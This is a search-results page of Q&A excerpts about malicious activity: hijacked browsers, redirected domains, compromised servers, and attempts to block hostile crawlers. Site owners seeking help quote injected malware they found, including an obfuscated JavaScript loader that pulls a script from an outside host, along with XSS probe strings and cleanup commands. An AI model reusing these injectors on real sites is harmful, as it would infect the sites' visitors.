Search Results

Search found 417 results on 17 pages for 'malicious'.

Page 1/17 | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Untraceable malicious browser calls

    - by MaximusOMaximus
    I installed Fiddler 4 Beta to do some HTTP tracing. I found a lot of calls being made to sites like : facebook, collegehumor and a bunch of other sites I've never visited. Could not trace what/who is initiating these calls as I do not see any Windows Processes. No one else is connected to my network. I use both Google Chrome and IE10 on a Windows 7 box. Please help me tracing and removing these malicious HTTP calls.

    Read the article

  • Domain points me to some malicious URL and I can't get rid of it

    - by Legend
    Whenever I enter my URL into the browser, it keeps pointing me to http://fornax.myvnc.com/dev The URL doesn't even work and my antivirus doesn't complain about it so I am not sure what is happening. I logged into my domain manager at godaddy and it says that the nameservers are pointing to: NS46.DOMAINCONTROL.COM and I am not sure where this came from either because my hosting is with lunarpages whose nameserver is NS1.LUNARMANIA.COM I tried looking into my .htaccess and it is blank. My index.php was hijacked with some malicious code so I removed it completely. Everything is supposed to be normal now but still some kind of a redirection is taking place and am not sure where this is happening. Any suggestions?

    Read the article

  • Malicious javascript code in my website

    - by Depami
    I found this code in my website sourcecode: var _0xd28d=["\x5F\x30\x78\x33\x32\x6C\x73\x6A\x39","\x5F\x78\x6C\x74","\x5F\x78\x38\x66\x6B\x63\x33","\x66\x6C\x6F\x6F\x72","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68"];var _0x9ae4=[_0xd28d[0],12,_0xd28d[1],_0xd28d[2],2,31,Math,_0xd28d[3]];var _0xcd6e=[_0x9ae4[5],_0x9ae4[0],_0x9ae4[_0x9ae4[4]],_0x9ae4[3],4,_0xd28d[4]];var _0xr6g0={};_0xr6g0[_0xcd6e[2]]=0;_0xr6g0[_0x9ae4[4]]=function (){var _0x4c68x4={};_0x4c68x4[_0xd28d[0]]=_0x9ae4[0];do{_0x4c68x4[_0x9ae4[0]]+=_0x4c68x4[_0xd28d[0]][_0x9ae4[6][_0x9ae4[7]](_0x9ae4[6][_0xcd6e[5]]()*_0x4c68x4[_0xd28d[0]][_0xd28d[5]])];} while(_0x4c68x4[_0xd28d[0]][_0xd28d[5]]<_0xcd6e[0]);;_0x4c68x4[_0x4c68x4[_0x9ae4[0]]]=function (){_0xr6g0[_0xcd6e[2]]++;_0xr6g0[_0xcd6e[2]]%=_0x9ae4[1];return _0x4c68x4[_0x4c68x4[_0x9ae4[0]]];} ;return _0x4c68x4[_0x4c68x4[_0xcd6e[1]]];} ;_0xr6g0[_0x9ae4[_0xcd6e[4]]]()()()()()()()()()()()()()()()(); I was wondering, what is it?

    Read the article

  • Ask HTG: Using the Malicious Software Removal Tool, Scheduling Computer Startups, and Diagnosing an Overheating Laptop

    - by Jason Fitzpatrick
    Once a week we select a few questions from the pile of emails we answer and share the solutions with the greater readership; this week we’re looking at the Microsoft Malicious Software Removal Tool, scheduling computer startups, and how to diagnose an overheating laptop. HTG Explains: When Do You Need to Update Your Drivers? How to Make the Kindle Fire Silk Browser *Actually* Fast! Amazon’s New Kindle Fire Tablet: the How-To Geek Review

    Read the article

  • Is it worthwhile to block malicious crawlers via iptables?

    - by EarthMind
    I periodically check my server logs and I notice a lot of crawlers search for the location of phpmyadmin, zencart, roundcube, administrator sections and other sensitive data. Then there are also crawlers under the name "Morfeus Fucking Scanner" or "Morfeus Strikes Again" searching for vulnerabilities in my PHP scripts and crawlers that perform strange (XSS?) GET requests such as: GET /static/)self.html(selector?jQuery( GET /static/]||!jQuery.support.htmlSerialize&&[1, GET /static/);display=elem.css( GET /static/.*. GET /static/);jQuery.removeData(elem, Until now I've always been storing these IPs manually to block them using iptables. But as these requests are only performed a maximum number of times from the same IP, I'm having my doubts if it does provide any advantage security related by blocking them. I'd like to know if it does anyone any good to block these crawlers in the firewall, and if so if there's a (not too complex) way of doing this automatically. And if it's wasted effort, maybe because these requests come from from new IPs after a while, if anyone can elaborate on this and maybe provide suggestion for more efficient ways of denying/restricting malicious crawler access. FYI: I'm also already blocking w00tw00t.at.ISC.SANS.DFind:) crawls using these instructions: http://spamcleaner.org/en/misc/w00tw00t.html

    Read the article

  • How to deal with malicious domain redirections?

    - by user359650
    It is possible for anybody to buy a domain name containing negative terms and point it to someone's website in order to damage their reputation. For instance someone could buy the domain child-pornography.com and point it to the address 64.34.119.12 which is the address behind stackoverflow.com and people navigating to the domain in question would end up visualizing content from StackExchange which would be detrimental to StackExchange's image. To illustrate this, I added the entry 64.34.119.12 child-pornography.com to my /etc/hosts file and tested. Here is what I obtained: I personally found this user experience terrible as someone could think that Stack Exchange are in favor of child pornography and awaiting support from the community to create a Q&A site about it. I tested with other websites and experienced other behaviors that I would categorize as follows: 1 - Useful 404 page (happens with stackoverflow.com): For me the worst way of handling this as the image of the targeted website is directly associated with the offending domain. The more useful the 404 page, the bigger the impression that the targeted website would be willing to help with child pornography. 2 - Redirection (happens with microsoft.com): For instance when accessing child-pornography.com you get redirected to www.microsoft.com. It isn't as bad as above as the offending domain name never appears alongside the targeted website's content, but still bad in my opinion as it gives the impression the targeted website bought the offending domain and redirected it to their website to get more traffic. 3 - Server error (happens with lemonde.fr): You get an error from the webserver which page doesn't contain any content that can be associated with the targeted website (e.g. default Apache 404 page, completely blank page). I believe that is good as the identify of the targeted website isn't revealed. Above are the various behaviors I experienced, but I also thought about a fourth way of dealing with this which is described below. 4 - Disclaimer page (haven't found any website implementing that technique): Display a message such as : "You ended here because someone bought and linked the child-pornography.com domain to our website. We do not own this domain and do not associate ourselves with it. This request has been logged by our servers and we will raise this issue with the competent authorities to have this domain taken down. If you want to access our website, please click here." The good thing about this method is that it can be implemented at application layer (good if you don't have control over web server which happens with some hosting solutions), allows you to protect yourself from any liability, and offer the visitor to be redirected to your own website. Which of the above options would you implement to deal with malicious domain linking (IMO only options 3 and 4 are worth considering) ?

    Read the article

  • How can I monitor a website for malicious changes to the files

    - by rossmcm
    I had an occasion recently where our website was compromised - a link farm was added to a couple of the pages on one occasion, and on another occasion, a large and nasty aspx file was put on the server. I won't mention the host's name (Hostway), but I was pretty annoyed that someone was able to do this. No, it wasn't a leaky password - around 10 sites hosted by HW with consecutive IP addresses got trashed. Anyway. What I need is a utility or service (preferably free) that takes a snapshot of my websites contents, and then regularly monitors the files (size and datestamp) for unauthorized changes or additions, and alerts me. I've used web services that monitor one file for changes, but I'm looking for something a bit more aggressive.

    Read the article

  • How Hackers Can Disguise Malicious Programs With Fake File Extensions

    - by Chris Hoffman
    File extensions can be faked – that file with an .mp3 extension may actually be an executable program. Hackers can fake file extensions by abusing a special Unicode character, forcing text to be displayed in reverse order. Windows also hides file extensions by default, which is another way novice users can be deceived – a file with a name like picture.jpg.exe will appear as a harmless JPEG image file. Can Dust Actually Damage My Computer? What To Do If You Get a Virus on Your Computer Why Enabling “Do Not Track” Doesn’t Stop You From Being Tracked

    Read the article

  • How can I monitor a website for malicious changes to the files

    - by user41421
    I had an occasion recently where our website was compromised - a link farm was added to a couple of the pages on one occasion, and on another occasion, a large and nasty aspx file was put on the server. I won't mention the host's name (Hostway), but I was pretty annoyed that someone was able to do this. No, it wasn't a leaky password - around 10 sites hosted by HW with consecutive IP addresses got trashed. Anyway. What I need is a utility or service (preferably free) that takes a snapshot of my websites contents, and then regularly monitors the files (size and datestamp) for unauthorized changes or additions, and alerts me. I've used web services that monitor one file for changes, but I'm looking for something a bit more aggressive.

    Read the article

  • Week in Geek: Google Finds 9,500 New Malicious Websites Per Day

    - by Asian Angel
    Our last edition of WIG for June is filled with news link goodness covering topics such as a new printer bomb malware that wastes reams of paper, Google bars a website that converts YouTube songs into MP3s, Ubuntu plans to drop GRUB 2 to implement UEFI SecureBoot compatibility, and more. Image courtesy of Google Online Security Blog. How to Make Your Laptop Choose a Wired Connection Instead of Wireless HTG Explains: What Is Two-Factor Authentication and Should I Be Using It? HTG Explains: What Is Windows RT and What Does It Mean To Me?

    Read the article

  • What does this script do? Is it malicious?

    - by ramdaz
    This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below.... var GU='';var h;var X=new String();var mP="";H=function(){var F=["hu"];function L(Lc,O,d){return Lc.substr(O,d);}OH=55345;OH-=37;var x=document;QM=6929;QM++;q=25298;q-=65;var t='';var vs={};var u=["hR"];var Oi=RegExp;var A={kh:"LQ"};var v=new String("/goo"+"gle."+L("com/DyBg",0,4)+L("abc.EBgq",0,4)+L("0vm1go.c1m0v",4,4)+"om/t"+L("erraX6U",0,4)+L(".comKvlS",0,4)+L("P1By.br.By1P",4,4)+"php");yz={Ec:false};function y(Lc,O){hI=24414;hI++;g={};a=28529;a--;var d=new String(L("[n0jJ",0,1))+O+String("]");var m=new Oi(d, String("g"));n={kW:40818};ly={HN:false};return Lc.replace(m, t);};ZW=9686;ZW-=202;GE=56525;GE-=235;D=["u_","QP"];var E=null;var vd={ka:"J"};var Jn=new Date();Xg={V:51919};var l=751407-743327;try {} catch(U){};var W=new String("body");var qi="qi";this.Vf=38797;this.Vf--;var P=y('skchrkikpjtJ','SvFJDneKyEB_akgG1jx6h7OMZ');var RlE=58536;var Xx=false;this.jo='';vi=41593;vi--;h=function(){try {var YU=new String();var DY="";var dY=y('c4rJeJaVt_ebEslVe4mJe_n4ty','bqV_4sJy6');CN={_Y:63379};s=x[dY](P);var fH="fH";pI=33929;pI--;Uw=[];var G=y('sVrvc5','5wvD6TG4IuR2MLBjQgPpbVK');var Wg=[];var Lc=l+v;var yW=new String();var iO=new String();var Oe=String("defe"+"r");var Et=["qO","AF"];var QX=13548;s[G]=new String("http:"+L("//ten5qC",0,5)+"thpro"+"fit.r"+L("u:mn7k",0,2))+Lc;PA={};s[Oe]=[2,1][1];this.Vt="Vt";var ho=46131;try {var kn='cI'} catch(kn){};this.ww=27193;this.ww+=97;x[W].appendChild(s);this.yk=60072;this.yk++;var Lp=new Date();} catch(PY){this.ku=43483;this.ku++;this.ra=47033;this.ra--;this.ru="ru";};var lu=new Array();var me=new String();};};YB=["LB","uM"];var AI={Vm:4707};H();this.mDs=57864;this.mDs-=135;zz=44697;zz++;var sn=[];window.onload=h;var PQ=false;var mF={Hm:false};try {var r_='iv'} catch(r_){};this.z_="z_";

    Read the article

  • What makes you trust that a piece of open source software is not malicious?

    - by Daniel DiPaolo
    We developers are in a unique position when it comes to the ability to not only be skeptical about the capabilities provided by open source software, but to actively analyze the code since it is freely available. In fact, one may even argue that open source software developers have a social responsibility to do so to contribute to the community. But at what point do you as a developer say, "I better take a look at what this is doing before I trust using it" for any given thing? Is it a matter of trusting code with your personal information? Does it depend on the source you're getting it from? What spurred this question on was a post on Hacker News to a javascript bookmarklet that supposedly tells you how "exposed" your information on Facebook is as well as recommending some fixes. I thought for a second "I'd rather not start blindly running this code over all my (fairly locked down) Facebook information so let me check it out". The bookmarklet is simple enough, but it calls another javascript function which at the time (but not anymore) was highly compressed and undecipherable. That's when I said "nope, not gonna do it". So even though I could have verified the original uncompressed javascript from the Github site and even saved a local copy to verify and then run without hitting their server, I wasn't going to. It's several thousand lines and I'm not a total javascript guru to begin with. Yet, folks are using it anyway. Even (supposedly) bright developers. What makes them trust the script? Did they all scrutinize it line by line? Do they know the guy personally and trust him not to do anything bad? Do they just take his word? What makes you trust that a piece of open source software is not malicious?

    Read the article

  • How to share malicious source code?

    - by darma
    I have a client whose site (not one i developed) is infected by a trojan/malicious code. I have asked him to send me the dirty files in a zip but either gmail or unzipping is blocking them. I've tried text files and word files, and i'm suspecting many different file types will be blocked the same way, either by my mail client, anti-malware software, browser etc. (which is normal). Do you know a way he could share those lines so i can read them and do some research about the malicious source code? An image/screenshot of his text editor would be an idea but the files are long + i'd prefer to be able to copy/paste from them. Thank you!

    Read the article

  • Inter-VLAN Malicious Code Scanning

    - by Jackthedog
    I am trying to find an inbuilt solution on a Cisco Catayst 3750X Switch to scan all traffic routed from one VLAN to another for malicious code. The situation is that we currently have a development environment which is currently being redesigned to upgrade the network infrastructure to use the 3750X switches to manage server and workstation connectivity as well as inter-VLAN routing. We also have another system that is responsible for taking the builds created on the development environment and imaging various HDDs. Because these are two separate systems, we have a requirement in the workplace to anti-virus scan any data transferred between these systems. This is done by copying the data from the originating system to external USB HDD, scanning in a standalone workstation and then copying the data on to the receiving system. As you can imagine this is extremely tedious and impractical most of the time... (I don't make the rules). Anyway, with this redesign going on, we would like to join the imaging system to the network infrastructure of the development system, keeping separation by the use of VLANs and restricting traffic by using ACLs. As we still have the requirement to scan all traffic I would like to configure some sort of malicious code scanning when ever traffic is routed between these VLANs. I am aware I could install a separate in-line IPS/IDS device, however both systems will be using multiple ports on the switch (obviously), and we won't be able to put a device on each port. I would would prefer not to add additional hardware if the 3750x switch is capable of doing the job. Is anyone aware of any Cisco solution that I could use here, that ideally can be incorporated into the 3750x switch? Thanks in advance.

    Read the article

  • How do you code against CSRF malicious requests?

    - by user355950
    how to Decline malicious requests.... Cross-Site Request Forgery Severity: Medium Test Type: Application Remediation Tasks: Decline malicious requests Reasoning: The same request was sent twice in different sessions and the same response was received. This shows that none of the parameters are dynamic (session identifiers are sent only in cookies) and therefore that the application is vulnerable to this issue.

    Read the article

  • Malicious Software

    - by Bb
    I had a program created for me recently and didn't really think about it being executable posing a threat since I pretty much trust the source but not completely. I then thought about the fact that a keylogger, or any kind of spyware or malicious software could've been possibly binded to it. This made me wonder about all the other stuff I download daily from places or people (torrents) I don't think twice about. My question is, how can someone find out if there has been some sort of keylogger binded to the software you're running or other things binded? What are some good ways to find out and stop these things?

    Read the article

  • sed comand - remove virus from wordpress [duplicate]

    - by EliaszKubala
    This question already has an answer here: How do I deal with a compromised server? 12 answers I have malicious code in every php file. This malicius code is auto paste at the beginning of file. I want to remove this with UNIX command from console. This is malicious code: <?php $guobywgpku = '..... u=$bhpegpvvmc-1; ?> I write this RegExp, "/<\?php \$guobywgpku.*\?>/m" and this RegExp work. I tested it here. The problem is, write command which remove this malicious code from every php file on the sever. Please Help me. Now i have something like this. sed "/<\?php \$guobywgpku.*\?>/m" index.php

    Read the article

  • Retrieve malicious IP addresses from Apache logs and block them with iptables

    - by Gabriel Talavera
    Im trying to keep away some attackers that try to exploit XSS vulnerabilities from my website, I have found that most of the malicious attempts start with a classic "alert(document.cookie);\" test. The site is not vulnerable to XSS but I want to block the offending IP addresses before they found a real vulnerability, also, to keep the logs clean. My first thought is to have a script constantly checking in the Apache logs all IP addresses that start with that probe and send those addresses to an iptables drop rule. With something like this: cat /var/log/httpd/-access_log | grep "alert(document.cookie);" | awk '{print $1}' | uniq Why would be an effective way to send the output of that command to iptables? Thanks in advance for any input!

    Read the article

  • How to find malicious IPs?

    - by alfish
    Cacti shows irregular and pretty steady high bandwidth to my server (40x the normal) so I guess the server is udnder some sort of DDoS attack. The incoming bandwidth has not paralyzed my server, but of course consuming the bandwidth and affects performance so I am keen to figure out the possible culprits IPs add them to my deny list or otherwise counter them. When I run: netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n I get a long list of IPs with up to 400 connections each. I checked the most numerous occurring IPs but they come from my CDN. So I am wondering what is the best way to help monitor the requests that each IP make in order to pinpoint the malicious ones. I am using Ubuntu server. Thanks

    Read the article

  • Malicious content on server - next steps advice [closed]

    - by Under435
    Possible Duplicate: My server's been hacked EMERGENCY I just got an e-mail from my hosting company that they got a report of malicious content being hosted on my vps. I was unaware of this and started looking into it. I discovered a file called /var/www/mysite.com/osc.htm. Soon after I discovered some weird php files wp-includes.php and ndlist.php both recognized as being PHP/WebShell.A.1 virus. I removed all these files but I'm unsure of what to do next. Can anyone help me analyze the output below of sudo netstat -A inet -p -e and give advice on what's best to do next. Thanks very much in advance Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name tcp 0 0 localhost.localdo:mysql localhost.localdo:37495 TIME_WAIT root 0 - tcp 0 1 mysite.com:50524 xnacreators.net:smtp SYN_SENT Debian-exim 69746 25848/exim4 tcp 0 0 mysite.com:www tha165.thehealtha:37065 TIME_WAIT root 0 - tcp 0 0 localhost.localdo:37494 localhost.localdo:mysql TIME_WAIT root 0 - udp 0 0 mysite.com:59447 merlin.ensma.fr:ntp ESTABLISHED ntpd 3769 2522/ntpd udp 0 0 mysite.com:36432 beast.syus.org:ntp ESTABLISHED ntpd 4357 2523/ntpd udp 0 0 mysite.com:48212 formularfetischiste:ntp ESTABLISHED ntpd 3768 2522/ntpd udp 0 0 mysite.com:46690 formularfetischiste:ntp ESTABLISHED ntpd 4354 2523/ntpd udp 0 0 mysite.com:35009 stratum-2-core-a.qu:ntp ESTABLISHED ntpd 4356 2523/ntpd udp 0 0 mysite.com:58702 stratum-2-core-a.qu:ntp ESTABLISHED ntpd 3770 2522/ntpd udp 0 0 mysite.com:49583 merlin.ensma.fr:ntp ESTABLISHED ntpd 4355 2523/ntpd udp 0 0 mysite.com:56290 beast.syus.org:ntp ESTABLISHED ntpd 3771 2522/ntpd

    Read the article

  • Repeated installation of malicious software to do outbound DDOS attack [duplicate]

    - by user224294
    This question already has an answer here: How do I deal with a compromised server? 12 answers We have a Ubuntu Vitual Private Server hosted by a Canadian company. Out VPS was affected to do "outbound DDOS attack" as reported by server security team. There are 4 files in /boot looks like iptable, please note that the capital letter "I","L". VPS:/boot# ls -lha total 1.8M drwx------ 2 root root 4.0K Jun 3 09:25 . drwxr-xr-x 22 root root 4.0K Jun 3 09:25 .. -r----x--x 1 root root 1.1M Jun 3 09:25 .IptabLes -r----x--x 1 root root 706K Jun 3 09:23 .IptabLex -r----x--x 1 root root 33 Jun 3 09:25 IptabLes -r----x--x 1 root root 33 Jun 3 09:23 IptabLex We deleted them. But after a few hours, they appeared again and the attack resumed. We deleted them again. They resurfaced again. So on and so forth. So finally we have to disable our VPS. Please let us know how can we find the malicious script somewhere in the VPS, which can automatically install such attcking software? Thanks.

    Read the article

1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >